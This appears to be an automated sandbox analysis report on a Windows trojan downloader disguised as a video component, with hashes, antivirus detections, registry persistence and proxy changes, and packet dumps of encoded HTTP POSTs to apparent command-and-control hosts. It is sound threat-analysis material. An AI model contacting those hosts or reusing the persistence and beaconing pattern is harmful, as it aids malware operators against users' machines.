Analysis Date: 2015-01-17 21:19:13
MD5: c55e2707dc51ccb8bbf52b7a437530a5
SHA1: 59478089d47b034b658c815092cf48ff7de4b3e3

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 657e198738285cc73ab7d44351077f36 sha1: e86b4fd28b3834342f117205db611a4cd52d5525 size: 6656
Section .data md5: 3b314334213da0ac96ca5f2af88b23a1 sha1: b22819ca5e3c183b4c224747f335d1476acee74b size: 12288
Section .bss md5: 05ea70efaebf11603fb4528cfde6f567 sha1: 270c6516ab476ae35bca1b4c9da57c35bc041fa1 size: 109568
Section .idata md5: 4c4287e716f068a85c470bf7efc329c7 sha1: 3cf81d0f13804e68e5a6cd28af66c5ee11f8e9b9 size: 4608
Section .rsrc md5: b938ed6cf62f2f50bd7fdf62c52ecc61 sha1: bc24a2f666f6735755c84057bc728ce20159708f size: 4096
Timestamp: 2009-07-06 04:05:26
Version:
LegalCopyright: Copyright © 2010 PC Tools. All rights reserved. d
InternalName: 4JmagL8D.exe
FileVersion: 7.0.0.61
CompanyName: videosoft
LegalTrademarks:
Comments:
ProductName: OG ES
ProductVersion: 7.0.0.61
FileDescription: PwVideo Componentg
OriginalFilename: 4JmagL8D.exe
Packer: Borland Delphi 4.0
PEhash: 84ccaf6caf3dbf271493d9248b059fe99bb6b51c
IMPhash: 64d30ceaf4341462ae370bfc9e968073
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Variant.Kazy.20920
AV Alwil (avast): MalOb-IJ [Cryp]
AV Arcabit (arcavir): Gen:Variant.Kazy.20920
AV Authentium: W32/FakeAlert.KN.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen2
AV BullGuard: Gen:Variant.Kazy.20920
AV CA (E-Trust Ino): Win32/Renos.D!generic
AV CAT (quickheal): Trojan.Renos.LN
AV ClamAV: Trojan.Jorik-152
AV Dr. Web: Trojan.DownLoader2.44261
AV Emsisoft: Gen:Variant.Kazy.20920
AV Eset (nod32): Win32/Kryptik.NCQ
AV Fortinet: W32/Diple.IZ!tr
AV Frisk (f-prot): W32/FakeAlert.KN.gen!Eldorado
AV F-Secure: Gen:Variant.Kazy.20920
AV Grisoft (avg): Generic22.WHV
AV Ikarus: Trojan.SuspectCRC
AV K7: Trojan ( 0024c1841 )
AV Kaspersky: Worm.Win32.Skor.z
AV MalwareBytes: Trojan.Downloader
AV Mcafee: Downloader-CEW.ap
AV Microsoft Security Essentials: TrojanDownloader:Win32/Renos.PT
AV MicroWorld (escan): Gen:Variant.Kazy.20920
AV Rising: Trojan.Win32.Generic.12867422
AV Sophos: Mal/FakeAV-IZ
AV Symantec: Trojan.FakeAV
AV Trend Micro: TROJ_AGENT.SMAH
AV VirusBlokAda (vba32): Heur.Trojan.Hlux

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Process: C:\malware.exe
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\GHWAUC6NNZ ➝ C:\malware.exe
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\GHWAUC6NNZ\OteH ➝ xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS: 30.157.231.171
Winsock DNS: francisawe.com
Winsock DNS: spanishser.com

Network Details:

DNS: webcache.foreign.ccgslb.com
Type: A
58.68.168.250
DNS: webcache.foreign.ccgslb.com
Type: A
65.255.44.2
DNS: webcache.foreign.ccgslb.com
Type: A
209.177.90.10
DNS: webcache.foreign.ccgslb.com
Type: A
209.177.92.6
DNS: 58.com
Type: A
211.151.111.30
DNS: hatena.ne.jp
Type: A
59.106.194.19
DNS: francisawe.com
Type: A
192.64.178.149
DNS: dergeneral.com
Type: A
54.209.61.132
DNS: people.com.cn
Type: A
DNS: spanishser.com
Type: A
DNS: vawsofort.com
Type: A
HTTP POST: http://francisawe.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POST: http://30.157.231.171/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 192.64.178.149:80
Flows TCP: 192.168.1.1:1032 ➝ 30.157.231.171:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   6672616e 63697361 77652e63 6f6d0d0a   francisawe.com..
0x000000b0 (00176)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000c0 (00192)   3334310d 0a436f6e 6e656374 696f6e3a   341..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x000000e0 (00224)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000f0 (00240)   61636865 0d0a0d0a 64617461 3d2f436a   ache....data=/Cj
0x00000100 (00256)   45665a44 53767871 43694b30 6c74554d   EfZDSvxqCiK0ltUM
0x00000110 (00272)   31757932 2f797534 55355970 4e6d3176   1uy2/yu4U5YpNm1v
0x00000120 (00288)   2f2f6a54 6e675663 2b774d73 2b2b5a42   //jTngVc+wMs++ZB
0x00000130 (00304)   6a375a53 59547233 69426b47 2f672b37   j7ZSYTr3iBkG/g+7
0x00000140 (00320)   5643432f 30704537 6b4f4870 37655263   VCC/0pE7kOHp7eRc
0x00000150 (00336)   48506959 6f393930 4d55756a 67555734   HPiYo990MUujgUW4
0x00000160 (00352)   62765449 644e2f6a 50587547 506a6142   bvTIdN/jPXuGPjaB
0x00000170 (00368)   7a786c63 63356d70 4e303161 36742f51   zxlcc5mpN01a6t/Q
0x00000180 (00384)   69535858 77707a39 486d306b 7a396642   iSXXwpz9Hm0kz9fB
0x00000190 (00400)   6661556e 3130782f 474c636f 66526948   faUn10x/GLcofRiH
0x000001a0 (00416)   344c7646 73416947 59467361 696f4d57   4LvFsAiGYFsaioMW
0x000001b0 (00432)   30374b30 4533726b 6b334d65 5a557967   07K0E3rkk3MeZUyg
0x000001c0 (00448)   44654c47 77327331 322b6f50 4d4e726e   DeLGw2s12+oPMNrn
0x000001d0 (00464)   4a5a637a 687a5a38 78694e57 75355467   JZczhzZ8xiNWu5Tg
0x000001e0 (00480)   4f687134 4f715553 30424d54 644b3262   Ohq4OqUS0BMTdK2b
0x000001f0 (00496)   5a792f68 7833546e 6d477954 464c4868   Zy/hx3TnmGyTFLHh
0x00000200 (00512)   4c635266 2b76417a 494f424e 6d763433   LcRf+vAzIOBNmv43
0x00000210 (00528)   43444b32 51303541 56636d41 38324b68   CDK2Q05AVcmA82Kh
0x00000220 (00544)   54665573 732f476f 6c77786c 6d396b4c   TfUss/Golwxlm9kL
0x00000230 (00560)   6e726e6c 49365a67 366e3336 642f3334   nrnlI6Zg6n36d/34
0x00000240 (00576)   6b6f4656 78627151 6a2b673d 3d         koFVxbqQj+g==

0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   33302e31 35372e32 33312e31 37310d0a   30.157.231.171..
0x000000b0 (00176)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000c0 (00192)   3334310d 0a436f6e 6e656374 696f6e3a   341..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x000000e0 (00224)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000f0 (00240)   61636865 0d0a0d0a 64617461 3d2f436a   ache....data=/Cj
0x00000100 (00256)   45665a44 53767871 43694b30 6c74554d   EfZDSvxqCiK0ltUM
0x00000110 (00272)   31757932 2f797534 55355970 4e6d3176   1uy2/yu4U5YpNm1v
0x00000120 (00288)   2f2f6a54 6e675663 2b774d73 2b2b5a42   //jTngVc+wMs++ZB
0x00000130 (00304)   6a375a53 59547233 69426b47 2f672b37   j7ZSYTr3iBkG/g+7
0x00000140 (00320)   5643432f 30704537 6b4f4870 37655263   VCC/0pE7kOHp7eRc
0x00000150 (00336)   48506959 6f393930 4d55756a 67555734   HPiYo990MUujgUW4
0x00000160 (00352)   62765449 644e2f6a 50587547 506a6142   bvTIdN/jPXuGPjaB
0x00000170 (00368)   7a786c63 63356d70 4e303161 36742f51   zxlcc5mpN01a6t/Q
0x00000180 (00384)   69535858 77707a39 486d306b 7a396642   iSXXwpz9Hm0kz9fB
0x00000190 (00400)   6661556e 3130782f 474c636f 66526948   faUn10x/GLcofRiH
0x000001a0 (00416)   344c7646 73416947 59467361 696f4d57   4LvFsAiGYFsaioMW
0x000001b0 (00432)   30374b30 4533726b 6b334d65 5a557967   07K0E3rkk3MeZUyg
0x000001c0 (00448)   44654c47 77327331 322b6f50 4d4e726e   DeLGw2s12+oPMNrn
0x000001d0 (00464)   4a5a637a 687a5a38 78694e57 75355467   JZczhzZ8xiNWu5Tg
0x000001e0 (00480)   4f687134 4f715553 30424d54 644b3262   Ohq4OqUS0BMTdK2b
0x000001f0 (00496)   5a792f68 7833546e 6d477954 464c4868   Zy/hx3TnmGyTFLHh
0x00000200 (00512)   4c635266 2b76417a 494f424e 6d763433   LcRf+vAzIOBNmv43
0x00000210 (00528)   43444b32 51303541 56636d41 38324b68   CDK2Q05AVcmA82Kh
0x00000220 (00544)   54665573 732f476f 6c77786c 6d396b4c   TfUss/Golwxlm9kL
0x00000230 (00560)   6e726e6c 49365a67 366e3336 642f3334   nrnlI6Zg6n36d/34
0x00000240 (00576)   6b6f4656 78627151 6a2b673d 3d         koFVxbqQj+g==


Strings
{.3..
Bb..
.b.
..
.....
e..7M
..
040904E4
 2010  PC Tools.  All rights reserved. d
4JmagL8D.exe
7.0.0.61
&About
BBABORT
BBALL
BBCANCEL
Comments
CompanyName
Copyright 
E&xit
f8q4
&File
FileDescription
FileVersion
InternalName
LegalCopyright
LegalTrademarks
MAINMENU(
OG ES
oiPD
&Open
OriginalFilename
ProductName
ProductVersion
PwVideo Componentg
qgkr
SFD8
StringFileInfo
Translation
VarFileInfo
videosoft
VS_VERSION_INFO
0HF$-j
[0LS^'
13d|XB
1]n'7C
1Q!5K[
1Tn+ L
_2tI9mJKsVsV@8
2.YVSgE
:33:"$
"*"$33
3333:"$
333333
3333333
$3333333
33333333
33333333?333333
333333333333333333
3333333333333338
333333:"33333338
33333:"$3333338
3333339
333338
33333833
#33338
:*"*"$3338
333838
334C33333338
33B$3333333
34""C33333833
3)6{Fd
3B""$33333
`+3jMQR
"3(~sU
^3Vlup+Q;
4"*""C3338
__4Fkb@8
4$img$aM_
4iSrT(
4JmagL8D.exe
4K3P7I
4y`;O[=J
5esTUl
_5mp4QT76dv6I@8
5RhCf{
_6t">;
`}:6WGp8"
}7HW{\
\=7XE:
8`"^	:
8bh3IF
8CA7{2
_8yltIGvIZgG4@24
9toVmI
a95L`x
A,9C#4
,AddX_
Af58k^
ahy&%|
an6rWnHk
  </application> 
  <application> 
@AQTP!
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Windows - Setup UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
=\BbOd
BeginPaint
b{#^GVW
Bq!)dT
BY3P}F
"C3338
c3CEQud@20
C59s,Q
"C8338
CallNextHookEx
calloc
CallWindowProcA
CharLowerBuffA
CheckMenuItem
CLCIoi&
ClientToScreen
CompareStringA
</compatibility> 
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
CreateFileA
$D&$@;
D554wt
`.data
DefFrameProcA
_dEMZ_jk
DestroyIcon
DestroyMenu
dG-s}q
DispatchMessageA
D?$mf@
DrawEdge
DrawFrameControl
DrawMenuBar
DrawTextA
d@sG4g
],d]_u
_DVt6QqGVU@4
D(+Y?g
-egV"o
ELi3lQo
EnableMenuItem
Et;F\}U
@eX-ed`
ExitProcess
ExitThread
*fa1m]Rbh
flTZ4A=
]{fM8Lo
fPAxQl^
f?SfO@l
#G9'76
GetActiveWindow
GetClassLongA
GetClassNameA
GetClientRect
GetCurrentThread
GetCursorPos
GetKeyboardLayoutList
GetKeyboardState
GetKeyNameTextA
GetLastError
GetMenu
GetMenuState
GetModuleHandleA
GetStdHandle
GetStringTypeW
GetSysColor
GetSystemMenu
GetTickC
GetTopWindow
GetUserDefaultLCID
GetWindow
gHuK4y$A
GlobalAddAtomA
GlobalDeleteAtom
GnuM66
g=*S=W
G/u):I3
*g:W~Q<
G+x}\p}
g _Yy6n
HeapAlloc
HeapDestroy
HeapFree
<H<FR76@
h%HKVS
*\}h@+M
HPdhvsnuuP
H&sfS?q
H wGt$
hwQeFj
hXMV{gu
ibmR65iV8eF0d
@.idata
InsertMenuItemA
IntersectRect
InvalidateRect
#irPsG
IsChild
IsDialogMessageW
IsDlgButtonChecked
,i^Se3
IsMenu
IsWindowUnicode
IsWindowVisible
IsZoomed
IW3c4G
J_1_>EtS
"J333333
%J6	L~
J	83 ~,
"J"C3333
__jhvKXZ@24
jpxup}kM
[jrzuf
>k}8lU
.#K+e|
KERNEL32.DLL
KillTimer
K\T`~'
 L1~yC
le8fM^P
LoadCursorA
LoadIconA
LoadLibraryA
LoadLibraryExA
LoadResource
LocalReAlloc
l##P6j&
lstrcatA
lstrlenW
&M`%8W
main.cpl
MapWindowPoints
=#McaqY
memcpy
memset
MessageBeep
MgSQUh
m{HSDW?
m\J[2 3
msR9lR
msvcrt.dll
~M=ud(
n*~lU.
NnE=Xb5
nO+ZV .!
%_Nq!8(
NVFzM,
NWHyALW
=>o&gaAf
ogmJsM
OLEAUTu
o}>N/'
OpenClipboard
OpenIcon
O-(QP{K
_ORHmj
{OY9XD
+P@=4>
p!6[^4
p`aocn
pDeNghHf0
P/E9^\~
PeekMessageW
PI#H<w4
PKocjs
PostMessageA
_PPOnuQN
PR^0+N
PtInRect
PzA,->
()q40Xi
qxBz2VYFN
&QxwM{
~@QZ^&L
r+A1yjOz
,Rd0Ws
RedrawWindow
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
rjfz0*69
@.rsrc
ScreenToClient
      </security>
      <security>
SetActiveWindow
SetClipboardData
SetCursor
SetForegroundWindow
SetScrollPos
SetTimer
SetWindowPlacement
SetWindowPos
ShowScrollBar
SizeofResource
,(SP'm
sprintf
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> 
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
SystemParametersInfoA
%^t-Eu5
tf<>SD
T) G*\
    <!--The ID below indicates application support for Windows 7 --> 
    <!--The ID below indicates application support for Windows Vista --> 
This program must be run under Win32
-Tlt;q
ToWHgVh
t$/\+q
T]qUYO
tr9FvmS
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
T}.WV)
}TWW*M
t	zhyU
tZT(N|
.&u<7&
[uGR6(
uh85K7
uLaFPG
+ULi=7uu
uMYGJf
u:n_Y:
USER32.DLL
`V^\B[Q]
 VF!5WE#1
@VfXAH\
v;HvBSN
VirtualAllocEx
;ViXU+L
	Vp*LW
/v`qkPA|
V&Vfwt
w`+6j@
W8-@%^
wcschr
wcsncmp
wcstol
WiJhZ2Z
w-MjQ.
?W*pphR"q
w"RBVSu{
wsprintfA
^X2%IS
XlbEUp
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
x;Oqu9
^:X+xM*
Xykaz'r
y(f\oD
Yk6S04{
\Yk]e\
Yog3 |
~<*,YY5+
Y>(Y7#
Zd[+e?
%zgKv 
Zk!+{0QU
]zR})[
ZV]^$!
zx)e@V
Z[y(}SHi